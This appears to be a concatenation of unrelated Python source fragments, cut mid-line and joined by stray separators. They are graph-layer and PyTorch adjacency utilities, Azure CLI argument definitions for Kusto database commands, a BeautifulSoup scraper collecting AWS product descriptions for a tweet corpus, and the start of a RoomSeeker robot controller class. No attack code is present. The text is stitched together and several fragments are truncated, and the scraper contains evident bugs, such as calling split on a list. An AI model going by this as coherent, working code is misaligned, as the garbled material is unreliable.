rem_nodes = list(graph.nodes) + []
while rem_nodes:
layer_nodes = [node for node in rem_nodes if not par_dict[node]]
for node in layer_nodes:
for arg in graph.successors(node):
if node in par_dict[arg]: par_dict[arg].remove(node)
rem_nodes = [node for node in rem_nodes if not node in layer_nodes]
update_layers.append(layer_nodes)
# ensures leaf nodes are in the very first layer
# and root nodes in the very last
leaf_nodes, non_leaf_nodes = [], []
for layer in reversed(update_layers):
new_layer = []
for node in layer:
if graph.out_degree(node):
new_layer.append(node)
else:
leaf_nodes.append(node)
if new_layer:
non_leaf_nodes.append(new_layer)
assert len(set([el for lst in ([leaf_nodes] + non_leaf_nodes) for el in lst])) == len(graph.nodes)
return [leaf_nodes] + non_leaf_nodes
#################
# Encoder utilities
#################
def flip_upd_layers(upd_layers):
new_upd_layers = []
restr_upd_layers = [[(a, d, e) for a, d, e in upd_layer if d != None]
for upd_layer in upd_layers]
restr_upd_layers = [upd_layer for upd_layer in restr_upd_layers if upd_layer]
desc = set([y for upd_layer in restr_upd_layers for _, y, _ in upd_layer])
asc = set([x for upd_layer in restr_upd_layers for x, _, _ in upd_layer])
roots = [(x, None, None) for x in asc.difference(desc)]
for upd_layer in reversed(restr_upd_layers):
new_upd_layers.append([(d, a, e) for a, d, e in upd_layer])
return [x for x in ([roots] + new_upd_layers) if x]
def add_zv_to_no_deps(dir_upd_layer, node_zv, edge_zv):
upd_layer = []
for src, add, edge in dir_upd_layer:
add_triple = (src, add, edge)
if add == None: add_triple = (src, node_zv, edge_zv)
upd_layer.append(add_triple)
return upd_layer
#################
# PyTorch utilities
#################
def get_adj_matr(pairs, size, is_cuda=False, mean=False, gcn_agg=None):
if is_cuda:
i = torch.cuda.LongTensor(pairs)
else:
i = torch.LongTensor(pairs)
if gcn_agg != None:
n_lst = [1 / (gcn_agg[(0, src)] * gcn_agg[(1, add)])
for src, add in pairs]
if is_cuda: v = torch.cuda.FloatTensor(n_lst)
else: v = torch.FloatTensor(n_lst)
elif mean:
src_ct = {}
for src, _ in pairs:
if not src in src_ct: src_ct[src] = 0
src_ct[src] += 1
if is_cuda:
v = torch.cuda.FloatTensor([1 / src_ct[src] for src, _ in pairs])
else:
v = torch.FloatTensor([1 / src_ct[src] for src, _ in pairs])
else:
if is_cuda:
v = torch.cuda.FloatTensor([1 for _ in range(len(pairs))])
else:
v = torch.FloatTensor([1 for _ in range(len(pairs))])
if is_cuda:
return torch.cuda.sparse.FloatTensor(i.t(), v, size)
return torch.sparse.FloatTensor(i.t(), v, size)
def compute_att_aggr(node_matr, pairs, W_q, W_k, b_q, device, softmax=True):
all_ms, at_src | |
'User']), help='Principal type.')
with self.argument_context('kusto database-principal-assignment update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
c.argument('principal_id', help='The principal ID assigned to the database principal. It can be a user email, a'
'pplication ID, or security group name.')
c.argument('role', arg_type=get_enum_type(['Admin', 'Ingestor', 'Monitor', 'User', 'UnrestrictedViewers', 'View'
'er']), help='Database principal role.')
c.argument('tenant_id', help='The tenant id of the principal')
c.argument('principal_type', arg_type=get_enum_type(['App', 'Group', 'User']), help='Principal type.')
with self.argument_context('kusto database-principal-assignment delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
with self.argument_context('kusto database-principal-assignment wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
with self.argument_context('kusto attached-database-configuration list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
with self.argument_context('kusto attached-database-configuration show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto attached-database-configuration create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('database_name', help='The name of the database which you would like to attach, use * if you want to'
' follow all current and future databases.')
c.argument('cluster_resource_id', help='The resource id of the cluster where the databases you would like to at'
'tach reside.')
c.argument('default_principals_modification_kind', arg_type=get_enum_type(['Union', 'Replace', 'None']), help='The default principals modification kind')
with self.argument_context('kusto attached-database-configuration update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('attached_database_configuration_name', help='The name of the attached database configuration.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('database_name', help='The name of the database which you would like to attach, use * if you want to'
' follow all current and future databases.')
c.argument('cluster_resource_id', help='The resource id of the cluster where the databases you would like to at'
'tach reside.')
c.argument('default_principals_modification_kind', arg_type=get_enum_type(['Union', 'Replace', 'None']), help='The default principals modification kind')
with self.argument_context('kusto attached-database-configuration delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto attached-database-configuration wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto data-connection list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
with self.argument_context('kusto data-connection show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
with self.argument_context('kusto data-connection event-grid create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('storage_account_resource_id',
help='The resource ID of the storage account where the data resides.')
c.argument('event_hub_resource_id', help='The resource ID where the event grid is configured to send events.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('ignore_first_record', arg_type=get_three_state_flag(), help='A Boolean value that, if set to true, '
'indicates that ingestion should ignore the first record of every file')
c.argument('blob_storage_event_type', arg_type=get_enum_type(['Microsoft.Storage.BlobCreated', 'Microsoft.Stora'
'ge.BlobRenamed']), help='The name of blob storage event type to process.')
with self.argument_context('kusto data-connection event-hub create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('event_hub_resource_id', help='The resource ID of the event hub to be used to create a data connecti'
'on.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the event hub')
c.argument('compression', arg_type=get_enum_type(['None', 'GZip']), help='The event hub messages compression ty'
'pe')
with self.argument_context('kusto data-connection iot-hub create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('iot_hub_resource_id',
help='The resource ID of the Iot hub to be used to create a data connection.')
c.argument('consumer_group', help='The iot hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the iot hub')
c.argument('shared_access_policy_name', help='The name of the share access policy')
with self.argument_context('kusto data-connection event-grid update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('storage_account_resource_id',
help='The resource ID of the storage account where the data resides.')
c.argument('event_hub_resource_id', help='The resource ID where the event grid is configured to send events.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('ignore_first_record', arg_type=get_three_state_flag(), help='A Boolean value that, if set to true, '
'indicates that ingestion should ignore the first record of every file')
c.argument('blob_storage_event_type', arg_type=get_enum_type(['Microsoft.Storage.BlobCreated', 'Microsoft.Stora'
'ge.BlobRenamed']), help='The name of blob storage event type to process.')
with self.argument_context('kusto data-connection event-hub update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('event_hub_resource_id', help='The resource ID of the event hub to be used to create a data connecti'
'on.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the event hub')
c.argument('compression', arg_type=get_enum_type(['None', | |
import json
import html
import sys
import re
import urllib.parse
from urllib.parse import unquote
from time import sleep
from typing import Dict, List
from bs4 import BeautifulSoup
from requests import get
# This scripts extracts a list of product items dicts
# It is used by tweet.py to generate a corpus
# It only needs to be run to refresh aws.json,
# which is included in the Docker image
# The numbers of paragrahs of each product page to scrape
# The more we add, the less relevant it becomes
PARAGRAPHS = 1
def get_items() -> List[Dict]:
items = []
names = []
# Get main Webpage
url = "https://aws.amazon.com/products/"
r = get(url)
# Extract product <div> list, e.g.
# <div class="lb-content-item">
# <a href="/cloudwatch/?c=15&pt=1"> <i></i>
# <span>Amazon CloudWatch</span>
# <cite>Monitor Resources and Applications</cite>
# </a>
# </div>
soup = BeautifulSoup(r.text, "html.parser")
divs = soup.findAll("div", class_="lb-content-item")
# Structure
# {<item name>: <item desc>}
for d in divs:
product = dict()
sleep(1)
# Title (name) and subtitle (blurb)
product["name"] = d.a.span.text.strip()
product["blurb"] = d.a.cite.text.strip()
# Each product can exist in many main page
# categories, ignore subsquent ones
if product["name"] in names:
continue
# Get product Webpage
print("Getting", product["name"])
product_path = d.a["href"]
r = get(urllib.parse.urljoin(url, product_path))
# Extract product description
soup = BeautifulSoup(r.text, "html.parser")
# 1. Old product page, all <p> elements under div.lead
# e.g. https://aws.amazon.com/cloudsearch/
p = [x.text.strip() for x in soup.select("div.lead p")[:PARAGRAPHS]]
if not p:
# 2. New product page
# No distinct structure, but the first <p> elements
# Have the descriptions, take the first 2.
# e.g. https://aws.amazon.com/athena/
p = [x.text.strip() for x in soup.select("p")[:PARAGRAPHS]]
# elif not p:
# # 3. The page is irregular, ignore (e.g. a beta)
# # e.g. https://docs.aws.amazon.com/honeycode/index.html
# print("Can't parse", product["name"])
# continue
# try:
# # Old product page, first <p> under div.lead
# # e.g. https://aws.amazon.com/cloudsearch/
# # p = soup.select_one("div.lead p").text.strip()
# p = [x.text.strip() for x in soup.select("div.lead p")]
# except AttributeError:
# # New product page, first <p>
# # e.g. https://aws.amazon.com/athena/
# try:
# # The main description is the only <div> that has this
# # color style set. Text is in the <p> elements.
# print("HERE")
# p = [x.text.strip() for x in soup.select("div[style='color:#232f3e;'] p")]
# print("HERE")
# print(p)
# except AttributeError:
# # The page is irregular, ignore (e.g. a beta)
# # e.g. https://docs.aws.amazon.com/honeycode/index.html
# print("Can't parse", product["name"])
# continue
product["desc"] = " ".join(p)
names.append(product["name"])
items.append(product)
return items
def get_docs_items() -> List[Dict]:
# Main list of services
items = []
# List to keep track of already fetched products
# to prevent fetching them more than once
names = []
# List of extra "sub-genre" names to add to the list of names
# e.g. "Amazon Kinesis Data Firehose" or all the SageMakers
extra_names = []
# Get main Webpage docs XML
main_url = "https://docs.aws.amazon.com"
main_xml = get_page_xml(main_url)
main_soup = BeautifulSoup(main_xml, "lxml")
services = main_soup.find_all("service")
"""
<tile>
<title>AWS Management Console</title>
<services>
<service href="/awsconsolehelpdocs/latest/gsg/getting-started.html?id=docs_gateway">
<prefix></prefix>
<name>Getting Started with the Console</name>
[...]
</services>
</tile>
<tile>
"""
# aka 'tiles'
# Sections of https://docs.aws.amazon.com
sections_to_skip = [
"General Reference",
"AWS Management Console",
"SDKs & Toolkits",
"Additional Resources",
]
for s in services:
service = {
"name": "",
"blurb": "",
"abbreviation": "",
"desc": ""
}
# Skip the sections that aren't products per se.
# Section titles are HTML-escaped
section_title = s.parent.parent.title.string
if html.unescape(section_title) in sections_to_skip:
continue
# Service href
# Skip absolute product links (non-docs sites)
href = s["href"]
if not href.startswith("/"):
continue
# Name in the main XML doc
name = s.find("name").string
# Each product can exist in many main page
# section, ignore subsquent ones
if name in names:
continue
# Link names ending in "Overview" aren't really names
if name.endswith("Overview"):
continue
# Just a quick way to only query specifc products to test
# if name not in ["Neptune"]:
# continue
print(f"Processing {name}...")
# Get service landing page
sleep(0.5)
service_url = urllib.parse.urljoin(main_url, href)
service_xml = get_page_xml(service_url)
if service_xml is None:
continue
service_soup = BeautifulSoup(service_xml, "lxml")
"""
<landing-page>
<title>Amazon Elastic Compute Cloud Documentation</title>
<titleabbrev>Amazon EC2</titleabbrev>
<abstract>Amazon Elastic Compute Cloud (Amazon EC2) is a [...]</abstract>
[...]
<main-area>
<sections>
<section id="amazon-ec2">
<title>Amazon EC2</title>
<tiles>
<tile href="/AWSEC2/latest/UserGuide/">
<title>User Guide for Linux Instances</title>
<abstract> Describes key [...]</abstract>
<more-links/>
</tile>
</section>
[...]
</sections>
</main-area>
[...]
</landing-page>
"""
# Service name
# Page title is "<product> Documentation", remove " Documentation"
page_title = service_soup.find("landing-page").title.string
service_name = re.sub(r" Documentation$", "", page_title)
service["name"] = service_name
# Service blurb
# Remove extra newlines found in the XML
# Some landing pages don't have descriptions
service_blurb = service_soup.find("landing-page").abstract.string
try:
# 'blurb' obtained from HTML can have weird encoding
# fix: https://stackoverflow.com/a/66815577
bytes_blurb = bytes(service["blurb"], encoding="raw_unicode_escape")
service["blurb"] = bytes_blurb.decode("utf-8", "strict")
service["blurb"] = " ".join(service_blurb.split())
except:
service["blurb"] = ""
# Service abbreviation (e.g. 'Amazon EC2')
service["abbreviation"] = service_soup.find("landing-page").titleabbrev.string
# <section> names often contain extra AWS product names!
# Only if they start with "AWS", "Amazon"
# e.g. AWS Lambda Data Firehose
sections = service_soup.find_all("section")
try:
# Get section
sections_titles = [sec.title.text for sec in sections]
# Clean whitespace
" ".join(sections_titles.split())
# Filter
sections_titles = [
st
for st in sections
if st.startswith("AWS")
or st.startswith("Amazon")
or st.endswith("Documentation")
or st.endswith("User Guide")
and len(st.text) > 0
]
except:
sections_titles = []
print(f" Extra (section names): {sections_titles}")
extra_names += sections_titles
# Dig into the first link of the page to get more content
# (typically a 'User Guide' or 'Developer pythonGuide')
# Not all sections have hrefs. Get the first one that does.
service_hrefs = service_soup.find_all("tile")
for sh in service_hrefs:
try:
service_first_href = sh["href"]
break
except:
continue
# Discard URL parameters if they exist
if "?" in service_first_href:
service_first_href = service_first_href.split("?")[0]
print(f" Fetching {service_first_href}...")
# Skip absolute product links (non-docs sites)
if service_first_href.startswith("/"):
# The page has no XML layout, it's pure HTML
sleep(0.5)
service_first_url = urllib.parse.urljoin(main_url, service_first_href)
r = get(service_first_url)
service_first_soup = BeautifulSoup(r.text, "html.parser")
else:
# Hack-ish way to set the result to nothing, so the next steps will skip
# but the product will still get added to the dict.
service_first_soup = BeautifulSoup("", "html.parser")
# The page can sometimes be a placeholder with a redirect:
# The last index.html will be replaced by the page in <meta http-equiv="refresh">
# as in: <meta http-equiv="refresh" content="10;URL=concepts.html"
# e.g. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/index.html to:
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
meta_refresh = service_first_soup.find("meta", attrs={"http-equiv": "refresh"})
if meta_refresh:
index = meta_refresh["content"].split("=")[1]
# Re-request the above with the right redirected URL
if service_first_url.endswith("/"):
# e.g. "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/"
# Just add the new index
service_first_url = service_first_url + index
else:
# e.g. "https://docs.aws.amazon.com/sagemaker/latest/dg/what-is.htm"
# replace the last page of the path.
service_first_url = re.sub(r"([^/]+)$", index, service_first_url)
sleep(0.5)
r = get(service_first_url)
service_first_soup = BeautifulSoup(r.text, "html.parser")
# Get the first <p>. If it's too short, get the next and so on
paragraphs = service_first_soup.find_all("p")
for p in paragraphs:
clean_p = " ".join(p.text.split())
if len(clean_p) < 100:
continue
else:
# 'desc' obtained from HTML can have weird encoding
# fix: https://stackoverflow.com/a/66815577
bytes_desc = bytes(clean_p, encoding="raw_unicode_escape")
service["desc"] = bytes_desc.decode("utf-8", "strict")
break
# <dt> elements often contain extra AWS product names!
# Only if they start with "AWS", "Amazon" or the product name itself
# (from the main page, w/o a brand prefix, e.g. "SageMaker")
dts = service_first_soup.find_all("dt")
dts_list = [
dt.text
for dt in dts
if dt.text.startswith("AWS")
or dt.text.startswith("Amazon")
or dt.text.startswith(name)
and not len(dt.text.split()) > 4
]
# Clean
dts_list = [" ".join(dt.split()) for dt in dts_list]
print(f" Extra (terms): {dts_list}")
extra_names += dts_list
names.append(name)
items.append(service)
# Add the 'extra_names' to as new product entries (name only)
existing_names = [i["name"] for i in items]
extra_names = list(set(list(extra_names)))
for en in extra_names:
# Clean
en = " ".join(en.split())
if en in existing_names:
continue
else:
service = {"name": en, "blurb": "", "abbreviation": "", "desc": ""}
items.append(service)
return items
def get_page_xml(url) -> str:
r = get(url)
soup = BeautifulSoup(r.text, "html.parser")
script_tags = soup.select("script")
for s in script_tags:
if not s.string:
continue
match = re.search(
r"landingPageXml | |
#!/usr/bin/env python
# coding: utf-8
#==================================================================================================#
# #
# FILE : room_seeker_l1.py #
# Memo : RoomSeeker level 1 node class #
# #
# Updated : 2021/01/09 Started this project based on "turtlebot3_core_v2.py" #
# プロジェクトから分離して独立したモジュールとする #
# "arduino_motor_control"クラスを"RoomSeekerLevel1"に名前変更 #
# 2021/01/16 モーターコントロールノードを追加し始める #
# 2021/01/18 Added inverse kinematics program #
# 2021/01/21 Added sensor node communication program #
# 2021/01/28 Bug fix in reading process from sensor node #
# #
# (C) 2020 <NAME> #
# #
#==================================================================================================#
#==================================================================================================#
# Import Module #
#==================================================================================================#
import numpy as np # For matrix calculation
from math import * # For mathematical operation
#==================================================================================================#
# Constants #
#==================================================================================================#
# PS2 controller constants
PSB_SELECT = 0x0001
PSB_L3 = 0x0002
PSB_R3 = 0x0004
PSB_START = 0x0008
PSB_PAD_UP = 0x0010
PSB_PAD_RIGHT = 0x0020
PSB_PAD_DOWN = 0x0040
PSB_PAD_LEFT = 0x0080
PSB_L2 = 0x0100
PSB_R2 = 0x0200
PSB_L1 = 0x0400
PSB_R1 = 0x0800
PSB_GREEN = 0x1000
PSB_RED = 0x2000
PSB_BLUE = 0x4000
PSB_PINK = 0x8000
PSB_TRIANGLE = 0x1000
PSB_CIRCLE = 0x2000
PSB_CROSS = 0x4000
PSB_SQUARE = 0x8000
# Control Mode constants
MODE_TWIST = 0
MODE_PS2 = 1
#==================================================================================================#
# Descriminate the literal is integer or not #
#==================================================================================================#
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
#==================================================================================================#
# Descriminate the literal is Hexadecimal or not #
#==================================================================================================#
def is_hex(s):
try:
int(s, 16)
return True
except ValueError:
return False
#==================================================================================================#
# RoomSeeker level 1 class #
# Index of each wheelspace value : 0 - Front Right, 1 - Fron Left, 2 - Rear Right, 3 - Rear Left #
# Index of each workspace value : 0 - Long dir, 1 - Width dir, 2 - Yaw angle #
#==================================================================================================#
class RoomSeekerLevel1():
def __init__(self):
self.mode = MODE_TWIST # Controll mode 0 : command mode , 1 : PS2 controller mode
self.sample_num_node_MEGA = 0 # Sample number of the Arduino MEGA
self.sample_num_node_FM = 0 # Sample number of the Front Motor Controller
self.sample_num_node_RM = 0 # Sample number of the Rear Motor Controller
self.sample_num_host = 0 # Sample number of the host
self.sample_num_ul = 999 # Upper limit of sample number
self.sample_num_ll = 0 # Lower limit of sample number
self.dt = 0.01 # Sampling time of the motor controller
#self.dt = 0.1 # Sampling time of the motor controller
self.ros_rate = 1/self.dt # Set value for rospy.Rate()
self.ws_dir = np.array([-1.0, 1.0, -1.0, 1.0]) # Wheelspace direction co-efficient
self.cnt_now = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel encoder counted value
self.omega_res = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity response [rad/s]
self.omega_res_x10 = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity response [10^-1deg/s]
self.omega_cmd = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity command [rad/s]
self.omega_cmd_x10 = np.array([0.0, 0.0, 0.0, 0.0]) # Wheel space velocity command [10^-1deg/s]
self.vout = np.array([0, 0, 0, 0]) # Voltage output (PWM width : 0 - 4095)
self.x_res = np.array([0.0, 0.0, 0.0]) # Workspace pose response calculated from velocity response [0:m, 1:m, 2:rad]
self.x_res_ = np.array([0.0, 0.0, 0.0]) #
self.x_res2 = np.array([0.0, 0.0, 0.0]) # Workspace pose response calculated from velocity command [0:m, 1:m, 2:rad]
self.dx_res = np.array([0.0, 0.0, 0.0]) # Workspace velocity response [0 : m/s, 1 : m/s, 2 : deg/s]
self.dx_res_x10 = np.array([0.0, 0.0, 0.0]) # Workspace velocity response [0 : 10^-1m/s, 1 : 10^-1m/s, 2 : 10^-2deg/s]
self.x_cmd = np.array([0.0, 0.0, 0.0]) # Workspace pose command [0:m, 1:m, 2:rad]
self.dx_cmd = np.array([0.0, 0.0, 0.0]) # Workspace velocity command [0 : m/s, 1 : m/s, 2 : rad/s]
self.dx_rate_limit = np.array([0.010, 0.010, 0.050])# Rate limit value in workspace [0 : m/20ms, 1 : m/20ms, 2 : rad/20ms]
self.dx_cmd_rl = np.array([0.0, 0.0, 0.0]) # Workspace velocity command applied rate limit [0 : m/s, 1 : m/s, 2 : rad/s]
self.dx_cmd_x10 = np.array([0.0, 0.0, 0.0]) # Workspace velocity command x10ver [0 : 10^-1m/s, 1 : 10^-1m/s, 2 : 10^-2deg/s]
self.wheel_radius = 45.0 # Robot wheel radius [mm]
self.base_width = 215.0 # Robot wheel base width [mm]
self.base_length = 162.0 # Robot wheel base length (between front and rear wheel shaft) [mm]
self.J_inv = np.array([[1.0/(self.wheel_radius/1000.0), 1.0/(self.wheel_radius/1000.0), ((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)] # Inverse jacobian
,[1.0/(self.wheel_radius/1000.0), -1.0/(self.wheel_radius/1000.0), -((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]
,[1.0/(self.wheel_radius/1000.0), -1.0/(self.wheel_radius/1000.0), ((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]
,[1.0/(self.wheel_radius/1000.0), 1.0/(self.wheel_radius/1000.0), -((self.base_width/1000.0) + (self.base_length/1000.0))/2.0/(self.wheel_radius/1000.0)]])
self.J_inv_plus = np.dot(np.linalg.inv(np.dot(self.J_inv.transpose(), self.J_inv)), self.J_inv.transpose())
self.x_ul = [ 5000.0, 5000.0, 5000.0] # Upper limit of the Workspace
self.x_ll = [-5000.0, -5000.0, -5000.0] # Lower limit of the Workspace
self.ir_hex = 0 # Ir sensor date in hex
self.ax = 0 # Acc x-axis
self.ay = 0 # Acc y-axis
self.az = 0 # Acc z-axis
self.gc = -0.06097 / 180.0 * 3.141592 # Gyro constants to transform raw data to rad/s [rad/s]
self.gx = 0 # Gyro x-axis [rad/s]
self.gy = 0 # Gyro y-axis [rad/s]
self.gz = 0 # Gyro z-axis [rad/s]
self.gz_hpf = 0.0 # Gyro z-axis applied HPF [rad/s]
self.gz_hpf_tmp = 0.0 # Temporary for HPF [rad/s]
self.int_gz_hpf = 0.0 # Integral of gz applied HPF [rad]
self.g_gz = 1.0 # Cutoff angular frequency of HPF for gyro sensor [rad/s]
self.mx = 0 # Mag x-axis
self.my = 0 # Mag y-axis
self.mz = 0 # Mag z-axis
self.mx_lpf = 0 # Mag x-axis applied LPF
self.my_lpf = 0 # Mag y-axis applied LPF
self.mz_lpf = 0 # Mag z-axis applied LPF
#self.mx_offset = 27.715769 # Offset of Mag x-axis
self.mx_offset = 70.0 # Offset of Mag x-axis
#self.my_offset = -81.559509 # Offset of Mag y-axis
self.my_offset = -25.0 # Offset of Mag y-axis
self.mz_offset = 0.0 # Offset of Mag y-axis
self.mr_offset = 177.26162 # Radius of Mag x-y circle
self.g_mag = 1.0 # Cutoff angular frequency of LPF for magnetosensor [rad/s]
self.temp = 0 # Temperature
self.us_dist = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) # Distance from ultra sonic sensor
self.us_ok = 0 # Ultrasonic sensor is enabled or not
self.ps2_button = 0 # PS2 controller button state
self.ps2_analogRX = 0 # PS2 controller button state
self.ps2_analogRY = 0 # PS2 controller button state
self.ps2_analogLX = 0 # PS2 controller button state
self.ps2_analogRY = 0 # PS2 controller button state
self.conFM = 0 # Serial console connected to arduino motor controller
self.conRM = 0 # Serial console connected to arduino motor controller
self.conMEGA = 0 # Serial console connected to arduino motor controller
self.bat_vol = 0 # Battery voltage
self.bat_vol_x100 = 0 # Battery voltage x100 (raw data)
self.ps2_ctrl = 0 # PS2 controller is enabled or not
self.interval_MEGA = 0 # Interval between samples
self.interval_FM = 0 # Interval between samples
self.interval_RM = 0 # Interval between samples
self.interval = 0 # Interval
self.pi = 3.141592
self.kkk = 0
self.before_nokoriMEGA = ''
self.before_nokoriFM = ''
self.before_nokoriRM = ''
# Power control
self.control_on = 0
self.no_input_from_ps2 = 0
self.no_input_from_ps2_cnt = 0
self.no_input_from_twist = 0
self.no_input_from_twist_cnt = 0
def print_state(self):
